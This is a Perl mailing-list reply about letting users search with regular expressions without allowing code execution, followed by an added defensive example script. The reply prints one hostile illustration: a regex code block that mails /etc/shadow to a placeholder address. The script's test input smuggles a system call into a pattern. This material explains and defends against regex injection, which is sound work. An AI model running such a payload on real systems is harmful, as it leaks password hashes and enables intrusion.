Re: regexp validation (arbitrary code execution) (regexp injection)



On Wed, Jun 01, 2011 at 11:25:39PM +0200, Stanisław Findeisen wrote:
> Suppose you have a collection of books, and want to provide your users
> with the ability to search the book title, author or content using
> regular expressions.
>
> But you don't want to let them execute any code.
>
> How would you validate/compile/evaluate the user provided regex so as to
> provide maximum flexibility and prevent code execution?

In general this shouldn't be a problem provided you don't turn on

use re "eval";

$ perl -e '/$ARGV[0]/' '(?{ print "hello" })'
Eval-group not allowed at runtime, use re 'eval' in regex m/(?{ print "hello" })/ at -e line 1.

$ perl -Mre=eval -e '/$ARGV[0]/' '(?{ print "hello" })'
hello

Of course, you're not going to be too worried about people saying hello,
but once you can execute arbitrary code all bets are off:

$ perl -e '/$ARGV[0]/' '(?{ system "sudo mailx -s ha baddie\@example.com < /etc/shadow" })'

Make sure you don't do the whole match as part of a string eval, and
since you're only matching, you shouldn't have to worry about s///e.

If you prefer a more paranoid approach you might want to restrict the
characters you allow in the user input, but this doesn't provide maximum
flexibility.

--
Paul Johnson - paul@xxxxxxxx
http://www.pjcj.net
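A worked version of the approach in this reply, written as an added example for this page rather than code from the thread or its author. It compiles the user-supplied pattern with qr// inside a block eval (no string eval anywhere, and `use re 'eval'` never switched on), so an embedded (?{ ... }) or (??{ ... }) group is refused at compile time and a malformed pattern becomes a clean error instead of a crash. The book list, the field names and the subroutine names are constructed for illustration.

```perl
#!/usr/bin/perl
# Added example (not from the original thread): searching a constructed book
# collection with a user-supplied regex without enabling `use re 'eval'`.
use strict;
use warnings;

# Constructed sample data standing in for the book collection.
my @books = (
    { title => 'Programming Perl',              author => 'Larry Wall'     },
    { title => 'Mastering Regular Expressions', author => 'Jeffrey Friedl' },
    { title => 'Perl Best Practices',           author => 'Damian Conway'  },
);

# Compile the user pattern with qr// inside a *block* eval, never a string
# eval. Interpolating $pattern into qr// treats it purely as regex syntax;
# a code block such as (?{ ... }) dies with "Eval-group not allowed at
# runtime" because `use re 'eval'` is not in effect. The block eval only
# turns that die (or any syntax error) into a returned error message.
sub compile_user_pattern {
    my ($pattern) = @_;
    my $re = eval { qr/$pattern/i };
    return (undef, $@) unless defined $re;
    return ($re, undef);
}

# Match the compiled regex against one field of every book. Only =~ is used,
# so there is no s///e and no eval of user data anywhere in the path.
sub search_books {
    my ($re, $field) = @_;
    return grep { $_->{$field} =~ $re } @books;
}

# Whitelist the searchable field rather than letting the user pick any key.
my $field   = shift // 'title';
my $pattern = shift // 'perl';
die "unknown field '$field'\n" unless $field eq 'title' or $field eq 'author';

my ($re, $err) = compile_user_pattern($pattern);
if ($err) {
    print "rejected pattern: $err";
    exit 1;
}
printf "%s by %s\n", $_->{title}, $_->{author} for search_books($re, $field);
```

Running it as `perl search.pl title 'perl'` lists the two Perl titles; running it as `perl search.pl title '(?{ system "id" })'` prints the "Eval-group not allowed at runtime" message from the compile step and exits, which is exactly the behaviour the reply relies on.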


